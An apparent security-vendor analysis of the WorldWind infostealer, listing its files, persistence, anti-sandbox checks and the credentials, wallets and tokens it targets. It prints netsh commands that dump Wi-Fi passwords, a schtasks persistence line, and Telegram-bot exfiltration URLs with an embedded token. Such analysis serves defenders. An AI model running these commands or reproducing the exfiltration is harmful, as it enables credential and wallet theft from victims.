TrojanSpy.MSIL.WORLDWIND.A

This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan Spy adds the following folders:

• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Grabber
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Grabber\DRIVE-{Drive Letter} → replica of drives in the machine
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Discord
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Pidgin
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Telegram
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Steam
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Uplay
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Minecraft
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\{Wallet Name}
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\FileZilla
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\VPN\ProtonVPN
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\VPN\OpenVPN
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\VPN\NordVPN
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Directories
• %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System

(Note: %AppDataLocal% is the Local Application Data folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It drops the following files:

• %AppDataLocal%\{Hash Value}\history.dat → contains keylogged data; modifies the file attributes to make the file hidden
• %AppDataLocal%\{Hash Value}\msgid.dat → contains latest message ID

(Note: %AppDataLocal% is the Local Application Data folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It adds the following processes:

• cmd.exe /C chcp 65001 && netsh wlan show profile | findstr All → to retrieve the wireless network profiles
• cmd.exe /C chcp 65001 && netsh wlan show profile name=\""{Profile}"\"key=clear | findstr Key" → to retrieve the clear-text Wi-Fi password for a specific wireless network profile
• cmd.exe /C chcp 65001 && netsh wlan show networks mode=bssid → to retrieve the available wireless networks and their BSSIDs
• cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn \{Malware File Name without Extension}\ /tr \{Malware File Path}\{Malware File Name}\ & exit

It adds the following mutexes to ensure that only one of its copies runs at any one time:

• vx/BE7jbRUB6mf7JvBe7Aqms5ens79dF75erQeF42sT5vvO+4N9X2zk0aqxqkuguWA/A06An2byEZbqi5N4oc6eDd74t2bt19gesw0UIL8c=

Autostart Technique

This Trojan Spy adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
{Malware File Name} = {Malware File Path}\{Malware File Name}.exe

Information Theft

This Trojan Spy gathers the following data:

• Browser:
  • Credit Card Data
  • Login Data
  • Cookies
  • Browsing History
  • Download History
  • Autofill Data
  • Bookmarks
• FileZilla:
  • Host
  • Port
  • Username
  • Password
• VPN:
  • User Configuration
• Discord:
  • Token
• Pidgin:
  • Protocol
  • Login Data
  • Password
• Telegram:
  • Folders with folder name 16 characters long
  • Files with size less than or equal to 5120 bytes
  • Files with file name ending in s and 17 characters long
  • Files with file name starting with "usertag", "settings", or "key_data"
• Steam:
  • Application Name
  • GameID
  • Installed(Yes or No)
  • Running (Yes or No)
  • Updating (Yes or No)
  • Steam Authorization File
  • Autologin Data
• Uplay:
  • Files in the folder %AppDataLocal%\Ubisoft Game Launcher
• Minecraft:
  • Profiles
  • Servers
  • Screenshots
  • Modifications
  • Versions
• Directories Structure
• Running Processes:
  • Process Name
  • Process ID
  • Process Path
• Open Windows:
  • Process Name
  • Window Title
  • Process ID
  • Process Path
• Screenshot
• Webcam Capture
• Saved Wireless Networks:
  • Profile
  • Passwords
• Available Wireless Networks
• Product ID
• System Information:
  • Current Date and Time
  • System Version
  • User Name
  • Computer Name
  • Language
  • Installed Anti Virus Products
  • CPU Processor
  • GPU Name
  • RAM Amount
  • Processor ID
  • Battery Information
  • Screen Size
  • Default Gateway
  • Internal IP
  • External IP
  • Location
  • Log Files
  • Keystrokes
• Gathers information from:
  • Browsers:
    • Microsoft Edge
    • Gecko Based Browsers:
      • Firefox
      • Waterfox
      • K-Meleon
      • Thunderbird
      • IceDragon
      • Cyberfox
      • BlackHawk
      • Pale Moon
    • Chromium Based:
      • Chromium
      • Google Chrome
      • Opera Software
      • ChromePlus
      • Iridium
      • 7Star
      • CentBrowser
      • Chedot
      • Vivaldi
      • Kometa
      • Elements Browser
      • Epic Privacy Browser
      • Uran
      • Sleipnir5
      • Citrio
      • Coowon
      • liebao
      • QIP Surf
      • Orbitum
      • Comodo Dragon
      • Amigo
      • Torch
      • Yandex Browser
      • 360Browser
      • Maxthon3
      • K-Melon
      • Sputnik
      • Nichrome
      • CocCoc Browser
      • Chromodo
      • Atom
      • Brave-Browser
• FTP Clients:
  • FileZilla
• VPN:
  • ProtonVPN
  • NordVPN
  • OpenVPN
• Messaging Applications:
  • Discord
  • Pidgin
  • Telegram
• Gaming:
  • Steam
  • Uplay
  • Minecraft
• Cryptocurrency Wallets:
  • Zcash
  • Armory
  • bytecoin
  • Jaxx
  • Exodus
  • Ethereum
  • Electrum
  • AtomicWallet
  • Guards
  • Coinomi
  • Litecoin
  • Dash
  • Bitcoin

(Note: %AppDataLocal% is the Local Application Data folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Stolen Information

This Trojan Spy saves the stolen information in the following file:

• Edge and Chromium Based Browsers:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\CreditCards.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\Passwords.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\Cookies.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\History.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\Downloads.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\AutoFill.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\Bookmarks.txt
• Gecko Based Browsers:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\Bookmarks.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\Cookies.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\History.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\login.json → copy of the login.json file
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\key3.db → copy of the key3.db file
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Browsers\{Browser Name}\key4.db → copy of the key4.db file
• Discord:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Discord\tokens.txt
• Pidgin:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Pidgin\accounts.txt
• Telegram:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Telegram\{Folders in %Application Data%\Telegram\tdata with folder name 16 characters long}
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Telegram\{Files in %Application Data%\Telegram\tdata with size less than or equal to 5120 bytes}
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Telegram\{Files in %Application Data%\Telegram\tdata with file name ending in s and 17 characters long}
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Messenger\Telegram\{Files in %Application Data%\Telegram\tdata with file name starting with "usertag", "settings", or "key_data"}
• Steam:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Steam\Apps.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Steam\{Files in the Steam install path with "ssfn" in its file name}
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Steam\SteamInfo.txt
• Uplay:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Uplay\{Files in %AppDataLocal%\Ubisoft Game Launcher}
• Minecraft:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Minecraft\launcher_profiles.json
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Minecraft\servers.dat
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Minecraft\screenshots\{Screenshot Images}
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Minecraft\mods.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Gaming\Minecraft\versions.txt
• Cryptocurrency Wallets:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Zcash
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Armory
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\bytecoin
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Jaxx\com.liberty.jax\IndexedDB\file__0.indexeddb.leveldb
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Exodus\exodus.wallet
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Ethereum\keystore
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Electrum\wallets
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\atomic\Local Storage\leveldb
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Guarda\Local Storage\leveldb
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Wallets\Coinomi\Coinomi\wallets
• FileZilla:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\FileZilla\Hosts.txt
• ProtonVPN:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\ProtonVPN\{Subdirectories of %AppDataLocal%\ProtonVPN containing the string "Proton.exe" in its name}\user.config
• OpenVPN:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\OpenVPN\profiles\{Files in %Application Data%\OpenVPN Connect\profiles with the extension .ovpn}
• NordVPN:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\NordVPN\{Subdirectories of %AppDataLocal%\NordVPN containing the string "NordVpn.exe" in its name}\accounts.txt
• Directory Tree:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\Directories\{Directory Name}.txt
• System Information:
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System\Process.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System\Windows.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System\WorldWind.jpg
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System\Webcam.jpg
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System\SavedNetworks.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System\ScanningNetworks.txt
  • %AppDataLocal%\{Hash Value}\{User Name}@{Computer Name}_{Default User Locale}\System\ProductKey.txt

(Note: %AppDataLocal% is the Local Application Data folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Application Data% is the current user's Application Data folder, which is usually C:\Documents and Settings\{user name}\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Roaming on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Other Details

This Trojan Spy does the following:

• terminates itself if the any of the following conditions are satisfied:
  • If the manufacturer is "microsoft corporation" and the model contains the following strings:
    • VIRTUAL
    • vmware
    • VirtualBox
  • If the following sandbox related modules is loaded in the affected system:
    • SbieDll.dll
  • If the total size of the drive containing the system directory is <= 61 GB.
  • If the OS contains the string "xp".
• It creates a copy of the file it steals.
• It sends the stolen information via Telegram bot.
• It deletes the file after uploading.
• If the file to be sent is a directory, it creates a zip file and then deletes the original directory.

It adds the following scheduled tasks:

• Taks Name: \{Malware File Name without Extension}\
  Trigger: On user logon
  Action: {Malware File Path}\{Malware File Name}

Mobile Malware Routine

This Trojan Spy accesses the following website(s) to send and receive information:

• https://{BLOCKED}legram.org
• https://{BLOCKED}legram.org/bot{Telegram Token}/getUpdates → to retrieve incoming updates Update ID
• https://{BLOCKED}legram.org/bot{Telegram Token}/getFile?file_id={File ID} → to download a file
• https://{BLOCKED}legram.org/bot{Telegram Token}/getUpdates?offset={Update ID} → to update Telegram bot
• https://{BLOCKED}in.com/raw/7B75u64B → to retrieve the Telegram token
• https://{BLOCKED}legram.org/bot{Telegram Token}/sendMessage?chat_id={Telegram Chat ID}&text={Stolen System Information} → to send stolen system information
• https://{BLOCKED}legram.org/bot{Telegram Token}/sendDocument?chat_id={Telegram Chat ID} → to send documents containing stolen information
• https://{BLOCKED}legram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 → to send documents containing stolen information
• https://{BLOCKED}legram.org/file/bot{Telegram Token}/{File Path} → to download a file
• https://{BLOCKED}legram.org/bot{Telegram Token}/sendLocation?chat_id={Telegram Chat ID}&latitude={Latitude}&longitude={Longitude} → to send the location